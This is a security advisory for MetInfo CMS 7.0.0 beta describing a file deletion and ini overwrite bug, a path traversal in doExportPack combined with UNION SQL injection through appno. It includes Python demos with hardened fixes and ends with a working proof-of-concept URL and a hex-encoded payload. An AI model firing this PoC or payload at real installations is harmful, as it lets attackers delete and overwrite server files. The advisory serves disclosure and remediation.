Description
Vulnerability Name: MetInfo CMS ini file modification vulnerability
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0 beta
(This vulnerability is reliably exploitable only on Windows; see the Linux note at the end)
In /language/admin/language_general.class.php, look at the doExportPack method.
In this method the editor and site request parameters are concatenated into a filename value, and that value is then passed as the argument to the delfile method.
Now look at the source code of app/system/include/function/file.func.php.
delfile passes its filename argument to file_exists, and if that returns true the file named by the argument is passed to unlink and deleted. Nothing checks that the path stays inside the language directory.
Before analyzing this point further, consider how file_exists behaves differently on Linux and Windows.
On Linux (first picture), file_exists('asdf/../file') does not return true when there is no real directory named asdf, even though the ../ would lead back to an existing file: the kernel has to walk every path component, and the walk fails at the missing one. On Windows (second picture), file_exists returns true for the same path even when asdf is a fake directory, because the Win32 path normalizer removes 'asdf/..' lexically before the file system is ever consulted.
We will use this difference in the exploit.
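The file_exists difference above can be reproduced without a Windows machine. The Python below is an added example, not MetInfo's code: it mirrors delfile as described (file_exists, then unlink), builds a language_<site>_<editor> path (the exact format string MetInfo uses is an assumption modelled on this advisory), and compares the real os.path.exists result on the running host with a lexical '..' collapse that imitates the Win32 normalizer. The language directory and the target ini file are constructed in a temp dir. Beside it is a hardened delfile that whitelists site and editor and confines the resolved path to the language directory.

```python
import os
import re
import tempfile

# Only names built from these characters are accepted by the hardened delete below.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def build_pack_path(base_dir, site, editor):
    """Mirror the vulnerable construction: base_dir/language_<site>_<editor>.
    The exact format string used by MetInfo is an assumption; only its shape matters here."""
    return os.path.join(base_dir, "language_%s_%s" % (site, editor))


def windows_lexical_normalize(path):
    """Collapse '.' and '..' the way the Win32 path normalizer does, without touching the
    file system: a '..' discards the preceding component even if it never existed.
    This is why file_exists() on Windows returns true for a path through a fake directory."""
    absolute = path.startswith(("/", "\\"))
    parts = []
    for comp in path.replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()
            continue
        parts.append(comp)
    return ("/" if absolute else "") + "/".join(parts)


def vulnerable_delfile(filename):
    """delfile() as described on this page: file_exists() then unlink(), no confinement."""
    if os.path.exists(filename):
        os.unlink(filename)
        return True
    return False


def safe_delfile(base_dir, site, editor):
    """Hardened variant: whitelist both parameters, then confine the resolved path to base_dir.
    Returns False without touching the disk when either check fails."""
    if site not in ("admin", "web") or not SAFE_NAME.fullmatch(editor):
        return False
    base = os.path.realpath(base_dir)
    target = os.path.realpath(build_pack_path(base, site, editor))
    if os.path.commonpath([base, target]) != base:
        return False
    return vulnerable_delfile(target)


def demo():
    """Recreate the layout from the advisory in a temp dir: a language directory with NO
    language_web_ subdirectory, and a target ini file two '..' hops above the pack path.
    Returns the observations a reader would want to check."""
    root = tempfile.mkdtemp()
    lang_dir = os.path.join(root, "language")
    os.mkdir(lang_dir)
    target = os.path.join(root, "config.ini")
    with open(target, "w") as fh:
        fh.write("[constructed sample]\n")
    legit = build_pack_path(lang_dir, "web", "english")
    open(legit, "w").close()

    editor = "/../../config.ini"  # attacker-controlled editor parameter
    crafted = build_pack_path(lang_dir, "web", editor)
    result = {
        "crafted": crafted,
        "posix_host": os.name == "posix",
        # Linux: language_web_ does not exist, so the walk fails before reaching '..'
        "posix_exists": os.path.exists(crafted),
        # Windows: '..' removes the phantom component first, so the real file is found
        "windows_exists": os.path.exists(windows_lexical_normalize(crafted)),
        "safe_rejects": safe_delfile(lang_dir, "web", editor) is False,
        "safe_deletes_legit": safe_delfile(lang_dir, "web", "english"),
    }
    result["target_intact_after_safe"] = os.path.exists(target)
    # Simulate the Windows outcome: the delete succeeds and the file outside lang_dir is gone
    result["windows_deleted"] = vulnerable_delfile(windows_lexical_normalize(crafted))
    result["target_after_windows"] = os.path.exists(target)
    return result


if __name__ == "__main__":
    for key, val in demo().items():
        print("%-26s %s" % (key, val))
```

The whitelist on editor is what actually stops the attack; the realpath/commonpath check is defence in depth for a future code path that builds the name differently. On a Linux host the posix_exists observation is False, matching the advisory's note that the phantom language_web_ directory blocks the walk there.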
After the unlink, doExportPack calls the doget_admin_pack method.
Look at doget_admin_pack.
In its source code, if the site parameter is 'admin' or 'web', the appno parameter is used directly in a SQL query, and there are no single quotes around the appno value.
So we can execute a UNION SQL injection.
Furthermore, the rows returned by that SQL query become the content of the newly created ini file.
Because of the UNION SQL injection we can therefore control the ini file's content.
So the attack scenario is:
- give the site parameter the value 'admin' or 'web', and give the editor parameter a path such as '../../../---/{ini-filename}'
- give the appno parameter a SQL injection payload whose UNION SELECT returns the desired ini file content
On Linux, if there is no language_admin_ directory (the component built from the site parameter), this vulnerability does not occur, because file_exists fails on the missing component.
On Windows no language_admin_ directory is needed and the vulnerability triggers 100% of the time.
(Of course, on Linux the vulnerability also triggers if language_admin_, or any other directory name that can be built from the site and editor parameters, really exists.)
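The second step of the scenario, the appno injection that feeds doget_admin_pack and ends up as ini content, as an added example that is not MetInfo's code. The table, its columns and the two-column SELECT are assumptions standing in for the real language query; the injected strings are constructed. The payload keeps the advisory's shape, ' 1=1 union select <hex>,<hex>', with hex literals so no quote character is needed (MySQL accepts a bare 0x... form, SQLite used here spells the same bytes X'...'). A parameterised version shows the fix.

```python
import io
import sqlite3


def hex_literal(text):
    """Encode text as a hex string literal so the payload needs no quote characters.
    MySQL accepts a bare 0x... form; SQLite, used here, spells the same bytes X'...'."""
    return "X'%s'" % text.encode().hex()


def make_db():
    """Constructed stand-in for the MetInfo language table; its columns are an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE lang (appno INTEGER, name TEXT, value TEXT)")
    conn.executemany("INSERT INTO lang VALUES (?, ?, ?)", [
        (1, "met_index_title", "Home"),
        (1, "met_index_desc", "Welcome"),
        (2, "met_admin_title", "Admin"),
    ])
    return conn


def render_ini(rows):
    """Turn (name, value) rows into ini lines, as the export code is described to do.
    Hex literals come back from SQLite as bytes, so decode them like the text rows."""
    buf = io.StringIO()
    for name, value in rows:
        name = name.decode() if isinstance(name, bytes) else str(name)
        value = value.decode() if isinstance(value, bytes) else str(value)
        buf.write("%s = %s\n" % (name, value))
    return buf.getvalue()


def vulnerable_pack(conn, appno):
    """doget_admin_pack as described: appno concatenated into the WHERE clause, unquoted."""
    sql = "SELECT name, value FROM lang WHERE appno=" + appno
    return render_ini(conn.execute(sql).fetchall())


def hardened_pack(conn, appno):
    """Fix: accept only an integer and bind it as a parameter; the UNION has nowhere to attach."""
    if not appno.strip().isdigit():
        raise ValueError("appno must be a non-negative integer")
    rows = conn.execute("SELECT name, value FROM lang WHERE appno=?", (int(appno),)).fetchall()
    return render_ini(rows)


def build_payload(name, value):
    """The advisory's appno payload shape: ' 1=1 union select <hex>,<hex>'.
    'appno= 1=1' parses as (appno=1)=1, and the UNION must supply the same two columns."""
    return " 1=1 union select %s,%s" % (hex_literal(name), hex_literal(value))


def demo():
    """Run the constructed payload through both variants and report what each writes."""
    conn = make_db()
    payload = build_payload("injected_key", "attacker controlled")
    vulnerable_lines = sorted(vulnerable_pack(conn, payload).splitlines())
    try:
        hardened_pack(conn, payload)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    return {
        "payload": payload,
        "vulnerable_lines": vulnerable_lines,
        "hardened_rejected": hardened_rejected,
        "hardened_clean": sorted(hardened_pack(conn, "1").splitlines()),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print("%-18s %s" % (key, val))
```

The attacker's row lands in the ini output next to the legitimate appno=1 rows; with the real application that output is written to the path chosen through the editor parameter in step one, which is what turns a UNION injection into an arbitrary ini write.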
POC:
/admin/?n=language&c=language_general&a=doExportPack&site=web&editor=/../../../../../../Windows/test&appno= 1=1 union select 0x49732069732069742076756c6e657261626c653f3f,0x5965732121
(The two hex literals decode to the ASCII strings 'Is is it vulnerable??' and 'Yes!!', which become the content of the new ini file.)